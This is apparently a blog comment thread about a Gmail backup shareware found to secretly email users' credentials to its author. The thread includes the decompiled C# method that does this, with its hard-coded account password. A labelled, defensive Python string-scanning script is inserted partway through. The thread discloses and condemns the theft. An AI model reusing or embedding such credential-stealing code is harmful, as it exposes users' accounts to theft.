A Question of Programming Ethics

This sort of problem is what OAuth is designed to help solve.

Not only can 3rd party websites not truly be trusted with one’s passwords, now that all computers are pretty much online all the time, it’s not safe to trust closed source apps, or even open source apps with uninspected code, with one’s password.

First of all, Dustin Brooks for president. What a hero.

Next, note that matemedia.com (alleged publisher of this tool) has at least two telephone numbers:
1-877-309-7521
1-877-752-1309
(first via http://www.russmate.com/client_support.php, second via whois)

Dustin Brooks’ sense of humor seems to be at least equal to his sense of justice. I want Mr. Brooks to call “John Terry” and explain the situation. In fact, if he recorded the call and placed the MP3 on a lame shareware site I would probably even pay $29.95 to listen.

That’s fishy. Why would jterry need to include his u/p in the program? As a diabolical villain, I don’t think he’d make the cut to be on 24. I mean, this isn’t like an IRC bot where you have to put the hostname to phone home to into the bot… He could have sent email to his account without exposing the password!

Is he really that dense, or is this some kind of weird hoax?

One thing is true – if you DL the program and use reflector, you do indeed see the facts as they are described in this post:

public static void CheckConnection(string a, string b)
{
    try
    {
        MailMessage message = new MailMessage();
        message.To.Add("JTerry79@gmail.com");
        message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
        message.Subject = "Account";
        message.SubjectEncoding = Encoding.UTF8;
        message.Body = "Username: " + a;
        message.Body = message.Body + "\r\nPassword: " + b;
        message.BodyEncoding = Encoding.UTF8;
        message.IsBodyHtml = false;
        message.Priority = MailPriority.High;
        SmtpClient client = new SmtpClient();
        client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
        client.Port = 0x24b;
        client.Host = "smtp.gmail.com";
        client.EnableSsl = true;
        client.Send(message);
    }
    catch (Exception)
    {
    }
}

Very interesting Jeff. Btw, here in British Columbia, Canada, Software Engineers can be registered as Professional Engineers that adhere to this code of ethics:
http://www.apeg.bc.ca/resource/publications/actbylawscode.html

Interestingly enough, as a professional software engineer, you can be held legally responsible for the designs and codes you write. I wonder what our profession (vocation? craft?) would look like if we were all held legally responsible for our work?

Patrick wrote :
That’s fishy. Why would jterry need to include his u/p in the program?

Because GMail requires authentication to use their SMTP server.

Why would anyone pay $30 to get a backup copy of their GMail account when Thunderbird is free? Just connect to GMail’s IMAP server, set TB to save all downloaded messages, and do a complete sync. Not only would you then have a complete backup, but you would also be able to read and send email from TB while having it synced with GMail.

Just about any other mail client with IMAP support should also work.

Jeff’s usually really awesome about linking to sources.

Thank you, I do try very very hard to link all the sources I talk about. The original is from an email; I added some text to the post to clarify this and put Dustin’s name in bold.

And yes, Dustin is the hero here, not me. I’m just reporting it.

Look everyone, I don’t mean to be bursting everyone’s bubble but I’m not finding this in the source code anywhere. While this is my first time using reflector, I’m not an idiot and I have searched through all the source code Reflector produces and there is no reference to an email address "jterry79@gmail.com".

Now maybe the software has been updated and the malicious code has been removed, or maybe someone is crying wolf. I would love for someone to reference something specific other than “hey look what I found.”

Ryan wrote :
I’m not finding this in the source code anywhere

The CheckConnection method is in the SM.dll Mail class. It is not in the EXE.

Patrick copy / pasted the code accurately.
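
The exchange above turns on the strings sitting in a companion DLL rather than the EXE. As an added example (not part of the original comments or of the tool discussed), this triage sketch scans every binary in an install directory for mail-API names together with embedded addresses or SMTP hosts; the sample bytes and the `example.test` values are constructed placeholders.

```python
import re
from pathlib import Path

# .NET string literals live in the #US heap as UTF-16LE; type and member names
# live in the #Strings heap as UTF-8. Scan both encodings.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
SMTP_HOST = re.compile(r"\b(?:smtp|mail|mx)\d*\.[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b", re.I)
MAIL_API = ("SmtpClient", "NetworkCredential", "MailMessage")

def extract_strings(blob):
    """Return printable runs found as UTF-16LE and as ASCII."""
    found = [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]
    found += [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]
    return found

def scan_blob(name, blob):
    """Flag a binary that references mail APIs and embeds an address or SMTP host."""
    r = {"file": name, "emails": set(), "smtp_hosts": set(), "mail_api": set()}
    for s in extract_strings(blob):
        r["emails"].update(EMAIL.findall(s))
        r["smtp_hosts"].update(h.lower() for h in SMTP_HOST.findall(s))
        r["mail_api"].update(api for api in MAIL_API if api in s)
    r["suspicious"] = bool(r["mail_api"] and (r["emails"] or r["smtp_hosts"]))
    return r

def scan_directory(path):
    """Scan every EXE and DLL under an install directory, not only the main EXE."""
    return [scan_blob(p.name, p.read_bytes())
            for p in sorted(Path(path).rglob("*"))
            if p.is_file() and p.suffix.lower() in {".exe", ".dll"}]

def _us(text):
    return text.encode("utf-16-le")

# Constructed sample bytes (not real assemblies): a clean main EXE and a
# companion DLL carrying placeholder indicators.
SAMPLE_EXE = b"MZ\x90\x00" + _us("Backup complete") + b"\x01\x00System.Windows.Forms\x00"
SAMPLE_DLL = (b"MZ\x90\x00SmtpClient\x00NetworkCredential\x00MailMessage\x00"
              + b"\x2d" + _us("collector@example.test") + b"\x00"
              + b"\x23" + _us("smtp.example.test") + b"\x00")

if __name__ == "__main__":
    for name, blob in (("App.exe", SAMPLE_EXE), ("Helper.dll", SAMPLE_DLL)):
        print(scan_blob(name, blob))
```

A hit is only a lead for opening the flagged file in a decompiler; plenty of legitimate programs send mail, and obfuscated or encrypted strings will not show up in a plain string scan.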

What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I’m just curious as to where you would draw the line.

This was truly malicious behavior, but (as Jeff has pointed out in previous posts) users do not understand how accessible their identity can be:

I recently recovered a PC from a municipal recycling center. While evaluating its value for parts I discovered it was completely functional. The HDD still had the OS, Outlook, and several years of Turbo Tax on it. Everything was live. I didn’t have the nerve to call the guy and tell him how stupid he was, but I was kind enough to bomb the machine to bedrock before reconditioning it. My son now happily surfs PBS on it. Not a bad exchange for a $20 electronics recycling charge and a dead TV.

There are times when I really pity the great unwashed user contingent, and at the same time am grateful that most geeks are non-belligerent.

Wow! That’s all I can say. I wonder how many gmail accounts he’s harvested. Like someone said, maybe this should be reported to the police. Since google accounts can be linked to financial information (via google checkout), this could be considered theft.

Jeff,

Great detective work.

I don’t know if you’ve ever covered this, but I would think that just asking a user for username and password and email address on a website would probably net someone a certain percentage of people who would for simplicity’s sake just use the same username and password everywhere (thereby giving you their username and password to email, or who knows what).

In response to Travis, some engineers reportedly quit the company that makes the space shuttle’s robotic arm, because of a proposed takeover by a U.S. arms maker.

What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I’m just curious as to where you would draw the line.

That’s always been the big problem. It’s not unique to computer science at all. One could say it started with the physicists “knowing sin” but in reality you can trace it back a lot farther.

But in reality the people taking a paycheck always find a way to justify it to themselves. Oh, they’re not the ones harming others – that’s what the military does, what politicians do. Oh, they’re not the ones not contributing to society – they just make the tools. Same old story.

My oh my, that is horrible! It goes to show how much seemingly legitimate software we install that could be malicious, and how much trust we place in the authors.

This time round you had the source code, what about apps that we don’t?

Yeah, it’s bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.

You don’t have to try to justify it. Like it or not, there is evil in the world and people have a moral obligation to protect themselves and their families.

Some of us take that seriously, while others live behind that protection and point fingers about how bad it is.

Oh, and before I worked for a DoD contractor I worked on medical software that was responsible for helping to bring new lives into this world that might not make it.

With either job, I know I am making a difference in the world and sleeping just fine at night. I doubt if I would feel the same working on a new search engine or game or accounting package.

Didn’t Dustin email all the affected users to warn them to change their passwords?

I have a problem with 4 in conjunction with 5. Often I find a lot that is unfair in our current copyright law and fairness. (Example: the RIAA has changed its tune and claims it is illegal to rip a CD you purchased for your computer or MP3 player.)

In order to behave in a fair way, I should be allowed to break copyright. But then, I’d be breaking copyright.